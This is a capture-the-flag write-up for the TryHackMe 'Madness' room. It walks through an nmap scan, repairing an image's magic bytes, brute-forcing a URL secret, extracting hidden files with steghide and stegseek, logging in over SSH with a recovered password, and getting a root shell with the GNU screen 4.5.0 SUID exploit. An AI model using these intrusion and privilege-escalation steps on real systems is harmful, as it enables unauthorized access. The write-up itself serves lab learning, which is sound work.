TryHackMe: Madness
Madness was indeed madness: it had me going crazy and made me feel like there was always something missing. It was fun overall and fairly short.
https://tryhackme.com/room/madness
Initial Enumeration
Nmap Scan
We start with our nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.248.228
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 16:36 GMT
Nmap scan report for 10.10.248.228
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA)
| 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA)
|_ 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.32 seconds
Web 80
Not much to look at, so we go to port 80:
We see a default Apache page, but it has a weird image at the top. After looking at the source code, we find the following:
We couldn't find anything else with gobuster, so we download the supposed image to our machine to investigate:
┌──(kali㉿kali)-[~/Desktop]
└─$ wget http://10.10.248.228/thm.jpg
--2025-02-13 16:40:35-- http://10.10.248.228/thm.jpg
Connecting to 10.10.248.228:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22210 (22K) [image/jpeg]
Saving to: ‘thm.jpg’
thm.jpg 100%[================================================================>] 21.69K --.-KB/s in 0.06s
2025-02-13 16:40:35 (389 KB/s) - ‘thm.jpg’ saved [22210/22210]
Just opening the file, we get an error:
This means that the magic numbers (the file signature in the first bytes) are incorrect. To check, we run the xxd command:
┌──(kali㉿kali)-[~/Desktop]
└─$ xxd thm.jpg | head
00000000: 8950 4e47 0d0a 1a0a 0000 0001 0100 0001 .PNG............
00000010: 0001 0000 ffdb 0043 0003 0202 0302 0203 .......C........
00000020: 0303 0304 0303 0405 0805 0504 0405 0a07 ................
00000030: 0706 080c 0a0c 0c0b 0a0b 0b0d 0e12 100d ................
00000040: 0e11 0e0b 0b10 1610 1113 1415 1515 0c0f ................
00000050: 1718 1614 1812 1415 14ff db00 4301 0304 ............C...
00000060: 0405 0405 0905 0509 140d 0b0d 1414 1414 ................
00000070: 1414 1414 1414 1414 1414 1414 1414 1414 ................
00000080: 1414 1414 1414 1414 1414 1414 1414 1414 ................
00000090: 1414 1414 1414 1414 1414 1414 1414 ffc0 ................
Magic Numbers
With the hexedit tool, we can change the header to the correct format:
JPEG FORMAT:
FF D8 FF E0 00 10 4A 46 49 46 00 01
CURRENT FORMAT(PNG):
89 50 4E 47 0D 0A 1A 0A 00 00 00 01
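The same check and repair in code, as an added example that is not part of the original writeup: compare the type an extension claims with the type the leading bytes imply (the check an upload filter or triage script would run), and rewrite the first 12 bytes into the JFIF header shown above. The sample bytes are constructed from the xxd output of thm.jpg.

```python
from typing import Optional

# JFIF header the writeup patches in with hexedit: SOI (FF D8) + APP0 (FF E0),
# segment length 0x0010, "JFIF\0", version 1.x
JPEG_JFIF_HEADER = bytes.fromhex("ffd8ffe000104a4649460001")

# Signatures used for detection; only the types this writeup deals with
MAGIC = {
    "png": bytes.fromhex("89504e470d0a1a0a"),
    "jpeg": bytes.fromhex("ffd8ff"),
}

def detect_magic(data: bytes) -> Optional[str]:
    """Return the type implied by the leading bytes, or None if unknown."""
    for name, sig in MAGIC.items():
        if data.startswith(sig):
            return name
    return None

def claimed_type(filename: str) -> Optional[str]:
    """Return the type the file extension claims, normalised to MAGIC's keys."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}.get(ext)

def header_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension and the magic bytes disagree (thm.jpg's case)."""
    return claimed_type(filename) != detect_magic(data)

def repair_jpeg_header(data: bytes) -> bytes:
    """Overwrite the first 12 bytes with the JFIF header, leaving the rest intact."""
    if len(data) < len(JPEG_JFIF_HEADER):
        raise ValueError("file too short to hold a JFIF header")
    return JPEG_JFIF_HEADER + data[len(JPEG_JFIF_HEADER):]

# Constructed sample: the first 32 bytes of thm.jpg as shown by xxd above
SAMPLE = bytes.fromhex(
    "89504e470d0a1a0a0000000101000001"
    "00010000ffdb00430003020203020203"
)

if __name__ == "__main__":
    print("mismatch before:", header_mismatch("thm.jpg", SAMPLE))
    fixed = repair_jpeg_header(SAMPLE)
    print("detected after repair:", detect_magic(fixed))
```

The 12-byte overwrite works here because the APP0 segment length 0x0010 ends exactly at offset 20, where the file's first DQT marker (FF DB) already sits; a file with a different layout would need the header rebuilt from its real segment boundaries.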
And after changing it, we get a working image:
It gave us a directory, and going to it, we see the following:
We need to guess a secret, but first we check the source code:
A hint, saying that the secret is between 0 and 99. Our first instinct was to add ?secret= to the URL, which worked:
We can use Burp Suite to run through all the numbers and see which one is the secret number:
Now we can navigate to the secret 73 and see the real secret:
Shell as joker
Steganography
There wasn't much that we had hold of till now, except what looked like a password and an image. This could mean that something was hidden inside the image, and using steghide we were able to extract a text file from the thm.jpg image with the secret as the password:
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide extract -sf thm.jpg
Enter passphrase:
wrote extracted data to "hidden.txt".
Inside it had an encoded username:
Fine you found the password!
Here's a username
wbxre
I didn't say I would make it easy for you!
We can throw it into CyberChef and, using ROT13, we get the username:
Now we had a username, but we couldn't log in anywhere; something was missing. After a long time, with some help, I decided to check whether something was hidden inside the image on the task page:
┌──(kali㉿kali)-[~/Desktop]
└─$ stegseek --crack 5iW7kC8.jpeg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "password.txt".
[i] Extracting to "5iW7kC8.jpeg.out".
And it was. Another text file, but now with a password inside:
I didn't think you'd find me! Congratulations!
Here take my password
*axA&GF8dP
We could finally log into joker’s machine and get the user flag:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh joker@10.10.248.228
joker@10.10.248.228's password:
joker@ubuntu:~$ ls
user.txt
joker@ubuntu:~$ cat user.txt
THM{REDACTED}
Shell as root
Enumerating as joker, we look for SUID binaries and find a weird one:
joker@ubuntu:/$ find / -type f -perm -u=s 2>/dev/null
...
/bin/screen-4.5.0
/bin/screen-4.5.0.old
...
After a quick Google search, the first thing we find is an exploit:
We send the exploit to joker's /tmp folder, give it executable permissions, and run it. We get a root shell and can then read the root flag:
joker@ubuntu:/tmp$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
There is a screen on:
18216.pts-0.ubuntu (Attached)
1 Socket in /tmp/screens/S-joker.
# whoami
root
# cat /root/root.txt
THM{REDACTED}
At first the script wasn't working; I asked an AI for a fix and it gave me this: sed -i -e 's/\r$//' 41154.sh. What it essentially does is convert the line endings from CRLF to LF.